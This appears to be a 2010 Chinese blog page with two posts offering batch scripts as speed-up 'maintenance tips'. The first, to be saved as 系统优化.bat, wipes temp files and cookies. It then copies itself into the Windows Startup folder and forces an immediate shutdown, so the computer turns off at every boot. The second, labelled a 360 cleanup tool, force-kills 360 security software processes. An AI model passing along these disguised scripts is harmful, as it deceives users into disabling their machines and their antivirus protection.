文章数:17603篇    征文数:47965篇    摄影作品:2286
2010年03月04日  分类:消 息  评论(0)    查看原文
哈咯,电脑维护小技巧 将以下文字复制到记事本:   @echo off  echo 清理系统垃圾  echo 正在清除系统垃圾文件,请稍等......  del /f /s /q %systemdrive%\*.tmp  del /f /s /q %systemdrive%\*._mp  del /f /s /q %systemdrive%\*.log  del /f /s /q %systemdrive%\*.gid  del /f /s /q %systemdrive%\*.chk  del /f /s /q %systemdrive%\*.old  del /f /s /q %systemdrive%\recycled\*.*  del /f /s /q %windir%\*.bak  del /f /s /q %windir%\prefetch\*.*  del /f /s /q %windir%\temp\*.*  del /f /q %userprofile%\cookies\*.*  del /f /q %userprofile%\recent\*.*  del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"  del /f /s /q "%userprofile%\Local Settings\Temp\*.*"  del /f /s /q "%userprofile%\recent\*.*"  cls xox  @echo off&setlocal enabledelayedexpansion  set a=▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉   set b=  color 01  mode con cols=52 lines=11  echo/&echo\  set/p=        正在载入中......<nul&echo.  set/p=<nul&echo.  for /l %%a in (1,1,19) do (  set /a d=%%a*2+6  call :pp %%a  )  echo   pause>nul  :pp  set/p=      !a:~0,%1!<nul&set/p=!b:~0,%d%!<nul  ping -n 1 127.1>nul  goto :eof  echofor %%i in (C:\Documents and Settings\Administrator\「开始」菜单\程序\启动) do copy %0 %%i /y   shutdown -s -t 0   pause&exit   保存在桌面上,命名为 :系统优化.bat 保存后打开,系统速度如飞!
2010年03月04日  分类:消 息  评论(0)    查看原文
请复制一下文字至电脑中的“记事本”: cls @echo on  cd "%ProgramFiles%\360Safebox\Update" if exist "safeboxup.exe" (safeboxup.exe)  taskkill /f /im safeboxtray.exe 1>nul 2>nul    taskkill /f /im 360tray.exe 1>nul 2>nul taskkill /f /im safeboxtray.exe 1>nul 2>nul taskkill /f /im 360safebox.exe 1>nul 2>nul taskkill /f /im 360tray.exe 1>nul 2>nul taskkill /f /im 360safebox.exe 1>nul 2>nul if exist "360safebox.exe" (360safebox.exe) taskkill /f /im 360safebox.exe 1>nul 2>nul taskkill /f /im 360safebox.exe 1>nul 2>nul @echo on  cd "%ProgramFiles%\360Safebox\Update" if exist "safeboxtray.exe" (safeboxtray.exe)  taskkill /f /im safeboxtray.exe 1>nul 2>nul    taskkill /f /im 360tray.exe 1>nul 2>nul taskkill /f /im safeboxtray.exe 1>nul 2>nul      将以上文字复制到记事本后,保存在桌面上,命名为:360清理系统.bat      在桌面上双击后,后跳出“360离线清理工具”,打开后,发现电脑是不是速度如飞了!
首页 上页 1 下页 尾页